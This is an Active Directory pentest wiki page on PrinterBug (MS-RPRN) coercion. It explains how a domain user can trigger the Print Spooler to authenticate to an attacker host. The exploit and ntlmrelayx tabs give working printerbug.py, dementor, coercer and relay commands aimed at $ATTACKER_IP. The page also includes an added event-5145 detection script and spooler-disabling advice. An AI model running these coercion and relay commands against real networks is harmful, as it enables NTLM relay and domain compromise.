# MS-RPRN abuse (PrinterBug)

## Theory

Microsoft’s Print Spooler is a service handling print jobs and various other tasks related to printing. An attacker controlling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a host of the attacker's choosing. This flaw is a "won't fix" and is enabled by default on all Windows environments ([more info on the finding](https://fr.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/47)).

**The coerced authentications are made over SMB**. But MS-RPRN abuse can be combined with [WebClient abuse](/ad/movement/mitm-and-coerced-authentications/webclient.md) to elicit incoming authentications made over HTTP which heightens [NTLM relay](/ad/movement/ntlm/relay.md) capabilities.

The "specific call" mentioned above is the `RpcRemoteFindFirstPrinterChangeNotificationEx` notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.

{% hint style="info" %}
The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB `\pipe\spoolss` named pipe through the `IPC$` share.
{% endhint %}

## Practice

Remotely checking if the spooler is available can be done with [SpoolerScanner](https://github.com/vletoux/SpoolerScanner) (PowerShell) or with [rpcdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py) (Python).

The spooler service can be triggered with [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) or [SpoolSample](https://github.com/leechristensen/SpoolSample) (C#). There are many alternatives available publicly on the Internet.

{% tabs %}
{% tab title="Enumerate" %}
**rpcdump**

We can check if the spooler service is available on a target using [rpcdump.py](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) from impacket.

```bash
rpcdump.py $TARGET | grep -A 6 "spoolsv"
```

**NetExec**

[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to check if the spooler service is running.

```bash
netexec smb <TARGET> -u <USER> -p <PASSWORD> -M spooler
netexec smb <TARGET> -u <USER> -p <PASSWORD> --local-auth -M spooler
```

**SpoolerScanner**

Check if the spooler service is available (Windows) using [SpoolerScanner](https://github.com/vletoux/SpoolerScanner) (PowerShell).

```powershell
.\SpoolerScan.ps1
```

{% endtab %}

{% tab title="Exploit" %}
**PrinterBug**

Using [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) (Python) we can trigger the spooler to authenticate against our controlled server.

```bash
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
```

**Dementor**

Using [dementor](https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py) (Python) we can trigger the spooler to authenticate against our controlled server.

```bash
python dementor.py -d $DOMAIN -u $USERNAME -p $PASSWORD $ATTACKER_IP $TARGET_IP
```

**Coercer**

Yet another alternative is to use the [Coercer](https://github.com/p0dalirius/Coercer/tree/master) tool (Python) as follows.

```bash
# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-RPRN -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx -l $ATTACKER_IP -t $TARGET_IP
```

{% endtab %}

{% tab title="ntlmrelayx" %}
In the situation where the tester doesn't have any credentials, it is still possible to [relay an authentication](/ad/movement/ntlm/relay.md) and trigger the spooler service of a target via a SOCKS proxy.

```bash
ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
**Nota bene**: coerced NTLM authentications made over SMB restrict the possibilities of [NTLM relay](/ad/movement/ntlm/relay.md). For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.
{% endhint %}
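From a defender's side, the mechanism described in the Theory section (an RPC call carried over the `\pipe\spoolss` named pipe through the `IPC$` share) is also what makes the technique observable: on hosts where the "Detailed File Share" audit subcategory is enabled, each access to that pipe is logged as Security event 5145 with `ShareName` `\\*\IPC$` and `RelativeTargetName` `spoolss`. The following script is an added example, not code from the original page or from any of the tools it lists: it scans constructed 5145 records, filters for the spoolss pipe, discards sources from an assumed allowlist of hosts expected to talk to the spooler (print servers, print management stations), and flags the rest, noting how many distinct hosts each remaining source touched. Field names follow the Windows event XML; the sample records, the allowlist and the `corp.local` names are constructed.

```python
"""Flag PrinterBug-style spooler coercion attempts from Security event 5145 records.

Added example (not from the original page). Records, field names and the
allowlist are constructed to illustrate the logic; map them to your SIEM schema.
"""
import json

# Constructed sample: Security event 5145 (detailed file share) records as JSON lines.
# Record 1 and 4: one workstation reaching the spoolss pipe on a DC and a file server.
# Record 2: a print server legitimately reaching spoolss. Record 3: a different pipe.
# Record 5: an unrelated 4624 record that must be ignored.
SAMPLE_EVENTS = r"""
{"EventID": 5145, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP", "IpAddress": "10.0.5.23", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "spoolss", "AccessMask": "0x12019f"}
{"EventID": 5145, "Computer": "DC01.corp.local", "SubjectUserName": "PRINT01$", "SubjectDomainName": "CORP", "IpAddress": "10.0.1.10", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "spoolss", "AccessMask": "0x12019f"}
{"EventID": 5145, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP", "IpAddress": "10.0.5.23", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc", "AccessMask": "0x12019f"}
{"EventID": 5145, "Computer": "FS01.corp.local", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP", "IpAddress": "10.0.5.23", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "spoolss", "AccessMask": "0x12019f"}
{"EventID": 4624, "Computer": "FS01.corp.local", "SubjectUserName": "-", "IpAddress": "10.0.5.23"}
"""

# Assumed allowlist: source addresses that are expected to open the spooler pipe
# (print servers, print management hosts). Anything else talking to spoolss on a
# server that does not print for it is worth a look.
KNOWN_PRINT_CLIENTS = {"10.0.1.10"}


def parse_events(jsonl):
    """Parse JSON-lines event records into dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]


def is_spoolss_pipe_access(event):
    """True for a 5145 record showing access to the spoolss named pipe via IPC$."""
    if event.get("EventID") != 5145:
        return False
    share = event.get("ShareName", "").upper()
    target = event.get("RelativeTargetName", "").lower()
    # ShareName is logged as \\*\IPC$; compare the tail to tolerate host prefixes.
    return share.endswith("\\IPC$") and target == "spoolss"


def find_coercion_candidates(events, allowlist=KNOWN_PRINT_CLIENTS):
    """Return one alert per spoolss pipe access whose source is not allowlisted.

    Each alert carries the target host, the source IP, the account used and the
    number of distinct hosts that source reached spoolss on: one source opening
    the spooler pipe on several servers is a stronger signal than a single event.
    """
    hits = [e for e in events if is_spoolss_pipe_access(e)]
    hosts_per_source = {}
    for e in hits:
        hosts_per_source.setdefault(e["IpAddress"], set()).add(e["Computer"])
    alerts = []
    for e in hits:
        src = e["IpAddress"]
        if src in allowlist:
            continue
        alerts.append({
            "target": e["Computer"],
            "source_ip": src,
            "account": f'{e.get("SubjectDomainName", "")}\\{e.get("SubjectUserName", "")}',
            "distinct_targets": len(hosts_per_source[src]),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_coercion_candidates(parse_events(SAMPLE_EVENTS)):
        print(
            f'[spoolss pipe] {alert["account"]} from {alert["source_ip"]} -> '
            f'{alert["target"]} (source touched {alert["distinct_targets"]} hosts)'
        )
```

Event 5145 is only emitted when the "Audit Detailed File Share" subcategory is turned on, and it is noisy on busy file servers, so scope the collection to hosts that should never receive print traffic (domain controllers and most application servers). On those hosts the stronger mitigation is to stop and disable the Print Spooler service altogether, which removes the `spoolss` endpoint the coercion relies on; the detection above then mostly serves the servers where the spooler has to stay.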

## Resources

{% embed url="https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/" %}
